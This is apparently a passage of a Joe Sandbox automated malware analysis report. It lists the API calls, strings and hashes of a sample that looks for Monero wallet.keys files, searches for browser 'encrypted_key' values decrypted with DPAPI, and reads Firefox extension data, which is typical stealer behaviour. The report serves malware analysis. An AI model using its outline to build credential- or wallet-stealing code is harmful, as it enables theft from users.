                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00B06663
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B06726
                          • ExitProcess.KERNEL32 ref: 00B06755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: f68536779019cd5bfc1c2f25b41008777fda85b189df0103e38b5d1107bc37b2
                          • Instruction ID: 1038cd710ba5033a95f00f1c5a65b6ca9e4d1f419dfd2a88d0ce4b238dfe0475
                          • Opcode Fuzzy Hash: f68536779019cd5bfc1c2f25b41008777fda85b189df0103e38b5d1107bc37b2
                          • Instruction Fuzzy Hash: 4D314DB1901308AADB14EB54DC81FDEBBB8AF14300F405589F249A61D1DF746B48CFA6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B10E28,00000000,?), ref: 00B0882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B08836
                          • wsprintfA.USER32 ref: 00B08850
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: b867011ada102f0a6dd7adab6d52682c3940130650134c18adc4404b72b37e02
                          • Instruction ID: a20293f08610a1328d7b4cbf74c2140c31883526b956f2f746b570be694a5e66
                          • Opcode Fuzzy Hash: b867011ada102f0a6dd7adab6d52682c3940130650134c18adc4404b72b37e02
                          • Instruction Fuzzy Hash: D721E7B1A44308ABDB04DF98DD49FAEBBB8FB48B11F104159F645E7390C779A9018BA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00B0951E,00000000), ref: 00B08D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B08D62
                          • wsprintfW.USER32 ref: 00B08D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: c9684378fdd74260710f2f21a88ab1557c827535795ca0ddd70232694ddf938e
                          • Instruction ID: 2d9035450ceaabb699b645428d19c7343c04a2bb1187168be2e43b5797207cee
                          • Opcode Fuzzy Hash: c9684378fdd74260710f2f21a88ab1557c827535795ca0ddd70232694ddf938e
                          • Instruction Fuzzy Hash: 88E08CB0B40308FBC700DB98DC0EE69B7B8EB04702F000194FD4AC7380DA719E009BA2
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AFA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00AFA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00AFA6BC
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00AFA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 1e4619e63398dcae8d0ed8ec2190ede370b823aaf1364aa1a9320dbac69c57a4
                          • Instruction ID: be7c1942782c9de2d2e0e66ee7eaf5b175e2bd4dec54efc5f847d9fe122ec98b
                          • Opcode Fuzzy Hash: 1e4619e63398dcae8d0ed8ec2190ede370b823aaf1364aa1a9320dbac69c57a4
                          • Instruction Fuzzy Hash: CEE1EE729103089ADB04FBA4DD96EEE777CAF24300F508999F516B60D1EF346A49CB72
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AFD481
                          • lstrlen.KERNEL32(00000000), ref: 00AFD698
                          • lstrlen.KERNEL32(00000000), ref: 00AFD6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00AFD72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 7912493e24b35b9c8e7fca6aa86afa6e783fdd4ab9d97ae63e89f32e7ce57ea5
                          • Instruction ID: 790e39ab6a7869ce0368436a4c43df8bd94aa928f556a07b1e9b37f3c6ebe380
                          • Opcode Fuzzy Hash: 7912493e24b35b9c8e7fca6aa86afa6e783fdd4ab9d97ae63e89f32e7ce57ea5
                          • Instruction Fuzzy Hash: FF91F1729103089BDB04FBA4DD96EEE77B8AF14300F508999F507B61D1EF346A49CB62
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AFD801
                          • lstrlen.KERNEL32(00000000), ref: 00AFD99F
                          • lstrlen.KERNEL32(00000000), ref: 00AFD9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00AFDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 23f8b815fb452d9787c028347cae9f6f96ed32766ba9ed0fcd89a76f04b67692
                          • Instruction ID: c5b6229beb62f28491e779f1f267d7c345ae5c30057edd17b6020258a933e4d1
                          • Opcode Fuzzy Hash: 23f8b815fb452d9787c028347cae9f6f96ed32766ba9ed0fcd89a76f04b67692
                          • Instruction Fuzzy Hash: 3281E0729103089BDB04FBA4DD96EEE77B8AF54300F508999F507B61D1EF346A09CB62
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00B11580,00B10D92), ref: 00AFF54C
                          • lstrlen.KERNEL32(00000000), ref: 00AFF56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 49a32fad7b60cc69f31d0b4f9eca114834b461a7fb60794d067ce6f64e54e160
                          • Instruction ID: 90640c1d464c8b0f310f2eb5dc2302ebf4ef4918a109bedf83ce817c5acd25b3
                          • Opcode Fuzzy Hash: 49a32fad7b60cc69f31d0b4f9eca114834b461a7fb60794d067ce6f64e54e160
                          • Instruction Fuzzy Hash: CB51F371D103089ADB04FBA4DC96DED77B9AF54300F50C9A8F516A71D1EF34AA09CBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 677f2952f9805527c198e58da335cc0c28c48afd7b1313fac52d74b0158c4ee8
                          • Instruction ID: 980e8a47c2f97650304b519888a4532e658aab635011dbc56fab09b14da178e2
                          • Opcode Fuzzy Hash: 677f2952f9805527c198e58da335cc0c28c48afd7b1313fac52d74b0158c4ee8
                          • Instruction Fuzzy Hash: 9E414071D14209ABCB04EFA4D889AFEBBF8EF54704F008458E516762D0DB75AA45CFA2
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AF9D39
                            • Part of subcall function 00AF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9AEF
                            • Part of subcall function 00AF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B01
                            • Part of subcall function 00AF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9B2A
                            • Part of subcall function 00AF9AC0: LocalFree.KERNEL32(?,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B3F
                            • Part of subcall function 00AF9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AF9B84
                            • Part of subcall function 00AF9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00AF9BA3
                            • Part of subcall function 00AF9B60: LocalFree.KERNEL32(?), ref: 00AF9BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: d8af8a272630e179f43e6382136ac5340af9d7b6c4e2ce833999af0bdf1fdeda
                          • Instruction ID: 6c15f0adbc36c1d7bcf3e9f60154ef877c5e0881fd551199e1383de4d437835f
                          • Opcode Fuzzy Hash: d8af8a272630e179f43e6382136ac5340af9d7b6c4e2ce833999af0bdf1fdeda
                          • Instruction Fuzzy Hash: FD313EB6D1020DABCB14EBE4DD85BFFB7B8AB48304F544558FA05A7241EB349A04CBA1
                          APIs
                          • CreateFileA.KERNEL32(00B03AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00B03AEE,?), ref: 00B092FC
                          • GetFileSizeEx.KERNEL32(000000FF,00B03AEE), ref: 00B09319
                          • CloseHandle.KERNEL32(000000FF), ref: 00B09327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: f2970477d29a2576ff4cf8cc4b632655c4b3b223be08e3c43f75dc224af96302
                          • Instruction ID: f5af8a5760cb92001509cce948e2d592e9e62174882b8c89b4d7e802190d3ad6
                          • Opcode Fuzzy Hash: f2970477d29a2576ff4cf8cc4b632655c4b3b223be08e3c43f75dc224af96302
                          • Instruction Fuzzy Hash: F8F01475F44208ABDB10DBA4DC89B9E7BF9AB48760F108294AA91A72C0D670AA018F54
                          APIs
                          • __getptd.LIBCMT ref: 00B0C74E
                            • Part of subcall function 00B0BF9F: __amsg_exit.LIBCMT ref: 00B0BFAF
                          • __getptd.LIBCMT ref: 00B0C765
                          • __amsg_exit.LIBCMT ref: 00B0C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00B0C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
